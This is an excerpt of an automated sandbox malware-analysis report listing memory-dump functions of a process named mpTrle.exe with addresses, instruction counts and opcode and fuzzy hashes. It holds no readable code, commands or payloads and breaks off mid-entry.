Function 001FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.448909793.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1fd000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 822a4f47b767f3488ff492bfc427aaeb3e9338f9a703ff5981b33c5209fc8b68
Instruction ID: fea22b30c89d3d27d4c8e9493e704a31cb0e8d2007e5218a65819153123543c6
Opcode Fuzzy Hash: 822a4f47b767f3488ff492bfc427aaeb3e9338f9a703ff5981b33c5209fc8b68
Instruction Fuzzy Hash: 0921C575604344DFEB14DF14E8C4B36BB66EB84314F34C669E9494B246CB36D847CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001FD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.448909793.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1fd000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d69a25e178396ce36b2f668bd1b303d589dfdaab4868b0093b03f95a68965de
Instruction ID: f0371f0e26e1af0b21bdcd44afb18392ec17a6bb2a2645134af6b0c2409a5eaf
Opcode Fuzzy Hash: 6d69a25e178396ce36b2f668bd1b303d589dfdaab4868b0093b03f95a68965de
Instruction Fuzzy Hash: B821D775604344DFEB05DF14E9C4B36BB66FB84314F34C669E9494B246C336D846CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001FD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.448909793.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1fd000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6032b602b463b915c0ff2decf4f20dfa8dbb81ce2c16d5bb707df740245a89a
Instruction ID: 9eb58beb874883771aaf38d94a2733b41c79f265bda32fc2c4e2167049674cc7
Opcode Fuzzy Hash: d6032b602b463b915c0ff2decf4f20dfa8dbb81ce2c16d5bb707df740245a89a
Instruction Fuzzy Hash: DE2180755093848FDB02CF24D994725BF71EB46314F28C5EAD8498F667C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 047EDA40 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddc3ac07121ee01e2ddc27e54fef7a7390d099334b7a2580884a9229d70f43de
Instruction ID: a4ba108ce55e6b7e2ee93d95fb9b030c90a3c77df1983f2fb184a3c0221b7175
Opcode Fuzzy Hash: ddc3ac07121ee01e2ddc27e54fef7a7390d099334b7a2580884a9229d70f43de
Instruction Fuzzy Hash: 402198B4E0920ADFCB64DF9AC5809BEBBF5EB88300F609155D409A7715D730AE41DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001FD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.448909793.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1fd000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
Instruction ID: 972886c9fddc1fe5e00b273260246c76e2123f99536cbb88dfaa02b704914337
Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
Instruction Fuzzy Hash: C411BB75504284DFDB02CF10D5C4B25BFA2FB84314F24C6AAD9494B656C33AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 047EE9F8 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5120761d0580b5864ff61407dc5b4a9e0c9a12dcb3cd7ed5103efe4669812c
Instruction ID: c74e564afbbd4a768da73368a30c75eac521de8e60e4ae3f4f5c41b613258c80
Opcode Fuzzy Hash: 2e5120761d0580b5864ff61407dc5b4a9e0c9a12dcb3cd7ed5103efe4669812c
Instruction Fuzzy Hash: 1D11D770E05218DFCB18CFABD8549AEBBB6BF8D301F40C569E405A7364DB30A942DB50

Uniqueness

Uniqueness Score: -1.00%

Function 047EEE60 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50883ffbd9e359a49d09009599f927ee082afa261d818eaaeb151b849aa3af74
Instruction ID: 4e33eb59ef902fbd8a67115be881d4cea3e5379326e57a0fbf43ee19c0e51a01
Opcode Fuzzy Hash: 50883ffbd9e359a49d09009599f927ee082afa261d818eaaeb151b849aa3af74
Instruction Fuzzy Hash: 8801FB34A45108EFD704DBA6D655AADBBF9EF4D300F1585A4D40997361DB30EE41EB40

Uniqueness

Uniqueness Score: -1.00%

Function 047E6DB8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79d401800f89af920ba05f06e94e0022d120f9a591d84fbebe4f2b59f5468629
Instruction ID: 18588b2471acc86453eaf0b284cd47fe7a4b1d6c18b281577505fcc3b497574a
Opcode Fuzzy Hash: 79d401800f89af920ba05f06e94e0022d120f9a591d84fbebe4f2b59f5468629
Instruction Fuzzy Hash: 4AE08C30606218EBDB00EBF199147BE77ACDB0A200F9002B5810993250EF316E109BA5

Uniqueness

Uniqueness Score: -1.00%

Function 047E8140 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5347f5fa4115bff577abea665cc740321015da8c5a41c0acd409e29823a1325b
Instruction ID: 2d13e6442502143209e40a503bc611ba0eff9cd61d53acc556e6c87a16838338
Opcode Fuzzy Hash: 5347f5fa4115bff577abea665cc740321015da8c5a41c0acd409e29823a1325b
Instruction Fuzzy Hash: ECE01234A45208DBCB04EFA9D95167CBB78EB8A304F2096EDC80817341DB32AE42DB85

Uniqueness

Uniqueness Score: -1.00%

Function 047EC708 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 348af3a95802e1f0331edb5ba4eb9d1036f7b682ead0cf916f421f75af0ae90b
Instruction ID: b0e4eb0d70a9e5103e3fa19da045a2c25afbfc002f29ffa58ab2c59596fdae3a
Opcode Fuzzy Hash: 348af3a95802e1f0331edb5ba4eb9d1036f7b682ead0cf916f421f75af0ae90b
Instruction Fuzzy Hash: 22C04C301527448BD6352B95BD1C32C77987705356F840174D509415748F705856CA69

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mpTrle.exePID: 4088, Parent PID: 3780COMMON

Executed Functions

Function 0039F260 Relevance: 3.0, Strings: 2, Instructions: 545COMMON

Download Yara Rule

Strings

/}, xrefs: 0039F2DB
,/}, xrefs: 0039F2ED

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID: ,/}$/}
API String ID: 0-2913187141
Opcode ID: 59303e3ffaaf757b938b4ad92e958ef3a2428027432ca6bbefaaa768efcf275c
Instruction ID: efa9ff8bb0f11712456529b3a42bd900ff03edecfcbee06900cccec81553ad07
Opcode Fuzzy Hash: 59303e3ffaaf757b938b4ad92e958ef3a2428027432ca6bbefaaa768efcf275c
Instruction Fuzzy Hash: A6323030E106198FCB15EF75C89469DB7B6FFC9300F61C66AE409AB254EB70AD81CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00398B30 Relevance: 2.8, Instructions: 2839COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b615deb42799832ab154e85f64ad3d353f5f7c9aa34b67ed0be988a820f9b8b6
Instruction ID: 73884e145ba18681e19608c0d65637278c306bc81bd42a1383370c47f94cc586
Opcode Fuzzy Hash: b615deb42799832ab154e85f64ad3d353f5f7c9aa34b67ed0be988a820f9b8b6
Instruction Fuzzy Hash: ED63E831D10B1A8EDB11EF68C884699F7B1FF99300F55C79AE458B7121EB70AAD4CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0039BE80 Relevance: 2.3, Instructions: 2315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7826d01e964199fad35381e6666800248b6b935a1c1dd209043cacf8435220ea
Instruction ID: b0d6fab61fa03268a81d1d1f93d584f02f4138ad2dd4491561ea80db04d921e6
Opcode Fuzzy Hash: 7826d01e964199fad35381e6666800248b6b935a1c1dd209043cacf8435220ea
Instruction Fuzzy Hash: C1331B31D107198EDB11EF68C8846ADF7B1FF99300F15D79AE449AB211EB70AAC5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0039E572 Relevance: 2.3, Strings: 1, Instructions: 1014COMMON

Download Yara Rule

Strings

/}, xrefs: 0039F2DB

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID: /}
API String ID: 0-3633946992
Opcode ID: aa7d3c24be53857d931e49fc9f634ef7dfe8bce305b1858abde4788c745b3a5c
Instruction ID: cb852618b48ad3e9738891277476901c8508a32435b2ece240ae9fbddd86bc7f
Opcode Fuzzy Hash: aa7d3c24be53857d931e49fc9f634ef7dfe8bce305b1858abde4788c745b3a5c
Instruction Fuzzy Hash: 8B923734A00204CFDB25DBA8C584B5DBBF2EB45314F56886AE459EB361DB35EC86CF90

Uniqueness

Uniqueness Score: -1.00%

Function 003938F0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\VLl, xrefs: 00393B3B

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID: \VLl
API String ID: 0-3496349822
Opcode ID: b875009814f3b58aec6c49ef74a9296c9f59b3c48e294eef2de03c1c6d8711b1
Instruction ID: b2230e45e24070d3f4c7a4382f931fa74d8e6ef892866bfc7b8277aa693105c1
Opcode Fuzzy Hash: b875009814f3b58aec6c49ef74a9296c9f59b3c48e294eef2de03c1c6d8711b1
Instruction Fuzzy Hash: F0916EB1E10209CFDF15CFA9C9857EEBBF2EF88314F158529E405AB290DB749945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00456548 Relevance: .6, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892847a158c39f172a2872d06aa7fdc3c24a0a9aba3cb3bb4b7cd4ea778d439a
Instruction ID: fc24fb0ec9a1e324a5694c609d119b3dcf691b321501347030f6fa20c8cc3b95
Opcode Fuzzy Hash: 892847a158c39f172a2872d06aa7fdc3c24a0a9aba3cb3bb4b7cd4ea778d439a
Instruction Fuzzy Hash: B7327F70B002088FDF14DF68D494BAEB7B6EB88311F51852AE805EB355DB39EC46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004555E9 Relevance: .6, Instructions: 570COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fdb6edf51cae151208d4ab736d3a83349cc2f4d3db55f97d26fea6a761406bd
Instruction ID: 92ceca40e57d2785793519a1dd4f812e8cf461aa3a82b48b1a8c47235348a766
Opcode Fuzzy Hash: 2fdb6edf51cae151208d4ab736d3a83349cc2f4d3db55f97d26fea6a761406bd
Instruction Fuzzy Hash: 24227470A006048FEF24DB68C4A47BFB7B1EB95311F648927E845DB392DA38EC49CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00394508 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed0e3c8144aa491b7a0e3669cd11c12c10ec66bd05a236bbcffac311e23a808d
Instruction ID: b7d8eb6c85657f5d984651224b704d8dc4f78e119a804449cbc784f7e74f7cff
Opcode Fuzzy Hash: ed0e3c8144aa491b7a0e3669cd11c12c10ec66bd05a236bbcffac311e23a808d
Instruction Fuzzy Hash: 47B16FB0E10209CFDF15CFA9C885BDEBBF2AF89314F158529E814E7254EB749846CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00396908 Relevance: 3.1, Strings: 2, Instructions: 559COMMON

Download Yara Rule

Strings

4}, xrefs: 00396986
\}, xrefs: 00396A46

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID: 4}$\}
API String ID: 0-3794887465
Opcode ID: 0d27106d5ba35df7a9d3ae06247dea4cfc918bcea967c12ed69654a5f3e43e7d
Instruction ID: d115c5060051b76bd4da042e5099adb4bd43b0777285e2d81690ab62b21ac046
Opcode Fuzzy Hash: 0d27106d5ba35df7a9d3ae06247dea4cfc918bcea967c12ed69654a5f3e43e7d
Instruction Fuzzy Hash: 3512BD70B113058BCB15ABB8E88662D33A6FB85311F604D3AE00ADB355CF75ED579B81

Uniqueness

Uniqueness Score: -1.00%

Function 00455090 Relevance: 2.9, Strings: 2, Instructions: 392COMMON

Download Yara Rule

Strings

d@r, xrefs: 004553E1
P5}, xrefs: 004553ED

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID: P5}$d@r
API String ID: 0-1450692558
Opcode ID: bd86338ae61fb7178e0bba6132972860034bd88bc0802c1fac69a69cc4faa833
Instruction ID: 315b665cba91b2be415103de8ebedf5f07b57ee87d42c3055190d34fcfc8c1a2
Opcode Fuzzy Hash: bd86338ae61fb7178e0bba6132972860034bd88bc0802c1fac69a69cc4faa833
Instruction Fuzzy Hash: 70E18130E007098FDF25DFA4D4946AEBBB2EF85301F24856AE805EB355DB74AC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00451030 Relevance: 1.7, Strings: 1, Instructions: 405COMMON

Download Yara Rule

Strings

&55p, xrefs: 0045108B

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID: &55p
API String ID: 0-1955183375
Opcode ID: a3b2861e7f7289cef52f339694cfea5e0538968f9cf5516144f80085b2e5b769
Instruction ID: 576c6290c7b441764c6df462bddfa2f17ad62ac6dd6bdc1b5918cccddb5c7ae7
Opcode Fuzzy Hash: a3b2861e7f7289cef52f339694cfea5e0538968f9cf5516144f80085b2e5b769
Instruction Fuzzy Hash: 08F13E30A01204CFDB19EFA4D594B6EB7B6FF84301F64856AE8069B369DB35EC46CB44

Uniqueness

Uniqueness Score: -1.00%

Function 003938E5 Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

\VLl, xrefs: 00393B3B

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID: \VLl
API String ID: 0-3496349822
Opcode ID: 5dff59467bd29e9e268ee85eba0dc9835a8f7cc55c23c6423dc2fd05a3f8f724
Instruction ID: 2d6117adf4e722c6f2f2fa5b12afe2c6099b5efce3a179339088e9720821d163
Opcode Fuzzy Hash: 5dff59467bd29e9e268ee85eba0dc9835a8f7cc55c23c6423dc2fd05a3f8f724
Instruction Fuzzy Hash: 4E916CB1E10209DFDF11CFA9C9857DEBBF2AF88314F248129E405AB290DB749985CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00450249 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

:, xrefs: 00450251

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-336475711
Opcode ID: c0a027cf10f2ea932f5ccf44d2b81b70f60068412ae427254484ff6d7fa519b3
Instruction ID: 38c48fc5fbf0c400bc6ffe02f3e16531025ac0cd009c1c35e23d1a5fdc866d00
Opcode Fuzzy Hash: c0a027cf10f2ea932f5ccf44d2b81b70f60068412ae427254484ff6d7fa519b3
Instruction Fuzzy Hash: 7D813E34B002098FDB54DFA9C49575EBBE2ABC5301F10852AE80ADB395EB34EC468B95

Uniqueness

Uniqueness Score: -1.00%

Function 00451020 Relevance: 1.5, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

&55p, xrefs: 0045108B

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID: &55p
API String ID: 0-1955183375
Opcode ID: f0fa4f194b9c0c32e5d8e56ea664096231188551d79c56a63d9129f4a1336f32
Instruction ID: 210a1fd269448fb9d4311bb7e696d76c033e4ab6d5b2d610b8fe362df558386c
Opcode Fuzzy Hash: f0fa4f194b9c0c32e5d8e56ea664096231188551d79c56a63d9129f4a1336f32
Instruction Fuzzy Hash: 20818030A01204CFDB19EFA5D594B5EB7B7FF84301F548569E4059B3A9CB39AC86CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00391110 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ea2b909c1f703ab23b509e443a5da9bdb27722249055f3016f5488d55d69a6a
Instruction ID: 8654a6052ab4875bde06553100ec261d9647cfc8996c76096ecc1fdbaea472dd
Opcode Fuzzy Hash: 8ea2b909c1f703ab23b509e443a5da9bdb27722249055f3016f5488d55d69a6a
Instruction Fuzzy Hash: FAB1F56290F3D15FDB03A73A98A83C53FB09F57216F4A05E7D095CF0A3D518A849C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00398378 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 741d026adb4e22b1d0d2ffca4f88ca79018a7bb0f5b76829382d4c2df4363e0b
Instruction ID: 7c1267d881e8a25884f06933f76432dc2f3740ccbf62068653794c915b75cb23
Opcode Fuzzy Hash: 741d026adb4e22b1d0d2ffca4f88ca79018a7bb0f5b76829382d4c2df4363e0b
Instruction Fuzzy Hash: D0B15B35A002049FCB15DFA4D994AADBBB6EF89310F15846AE906EB360DF35EC42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 003944FD Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b4f90d0e7c0219f0aa029bf33146711f454ea53055e9716bf6476ab8ca9511
Instruction ID: bb06e3ad4addf90d8bb40470e326ce48b88dfc3505cce4a3a86aac3b0422cdc9
Opcode Fuzzy Hash: 52b4f90d0e7c0219f0aa029bf33146711f454ea53055e9716bf6476ab8ca9511
Instruction Fuzzy Hash: FEA15FB0E10209CFDF11CFA9D885BDDBBF1AF89314F258529E814E7254EB759886CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00450CA8 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fdf2f6a513db33f1e92523afbefd667cd64ca3135430944e132b85884d11259
Instruction ID: 09d263c9c6242b8d867f597340512e8d42f2cd14e7fd533b152776b6c5a7196e
Opcode Fuzzy Hash: 2fdf2f6a513db33f1e92523afbefd667cd64ca3135430944e132b85884d11259
Instruction Fuzzy Hash: 54A17E35A00204CFCB24DF64D588B5EB7F2EF84315F54896AE819AB351DB79EC4ACB44

Uniqueness

Uniqueness Score: -1.00%

Function 00395078 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c917406ebddaf733eeb55a0e0c7a6feebc99bed15dc313f896b0d9d0c437b8
Instruction ID: dcabb2c42c4a1b0ea1b85f82219a4347d98de1648d1549b29b1c57ceeca90601
Opcode Fuzzy Hash: 15c917406ebddaf733eeb55a0e0c7a6feebc99bed15dc313f896b0d9d0c437b8
Instruction Fuzzy Hash: A4916A34B006158FDF16DB68C898B6E7BB6EF89300F214469E406DB3A5CB75EC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00453500 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe34ad1eaebf56a263c29ca59e43608db69f8b082a7152c4fd309b6bd9d1d86d
Instruction ID: cce30a8533a88e9849287bd5444220f89460829df3711dfd1e7a7fc7b054af2d
Opcode Fuzzy Hash: fe34ad1eaebf56a263c29ca59e43608db69f8b082a7152c4fd309b6bd9d1d86d
Instruction Fuzzy Hash: CB917070B002098FDB24EF64C8957AE77F6EBC4341F50846AE819EB385EF74AD458B91

Uniqueness

Uniqueness Score: -1.00%

Function 00398890 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091c46903ed0503e2153eeab318addee2466592db88793ce3ba4b18e47e6649d
Instruction ID: f80c934d56685a0d9d6b14a86e86c7fc10822dbcf13b198271e26b146df60774
Opcode Fuzzy Hash: 091c46903ed0503e2153eeab318addee2466592db88793ce3ba4b18e47e6649d
Instruction Fuzzy Hash: 70816B71A002048FDB14DFA9D884B9EBBB2FF89310F25C16AE909AB395DB71D845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00458ED7 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 758b43de80123d706ac92b6904434185ce7e7b4835af3324af440bf0c861acf5
Instruction ID: 4589421a5c8d6536fe6a0a77d8b965232dcc08f07c5f7fc2e2086edc65bbdb8a
Opcode Fuzzy Hash: 758b43de80123d706ac92b6904434185ce7e7b4835af3324af440bf0c861acf5
Instruction Fuzzy Hash: C3715E31B006099FDB14DFA5C995A9EBBF6EF88301F14842AE409EB355DB34EC46CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00458EE8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b57cad1c427db9dbc1ab6117ea4b6111b10da6ca212c157dc4d889bc5c5fc28
Instruction ID: 5f8aaa43eb6264f42d692f82d57e5a152c17726e4833e698129c904d9d8093ef
Opcode Fuzzy Hash: 1b57cad1c427db9dbc1ab6117ea4b6111b10da6ca212c157dc4d889bc5c5fc28
Instruction Fuzzy Hash: E9715D31B006099FDB14DFA9C984A9EBBF6EF88305F14842AE409EB355DB34EC46CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004534F8 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36b135e98c18ddfa1d2725599ae32825f04b95b651169dcd18c95ba46be196f6
Instruction ID: 1824bf590f54a6389db2d0cf68559d325d4cff5ead42dd9ddb858cdc320f7fee
Opcode Fuzzy Hash: 36b135e98c18ddfa1d2725599ae32825f04b95b651169dcd18c95ba46be196f6
Instruction Fuzzy Hash: D6518F30B002058FCB14EF74D895B6E77E6EBC8341F50846AE81ADB395EB74AD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00395069 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18b5bc0f4265ad97a3b398c942431d4701099c4d0adbcd9b84436542bdae25a9
Instruction ID: a00410e7687aabec1bdd47556e34f756e69589335a95dfcf6965f085f8f13c93
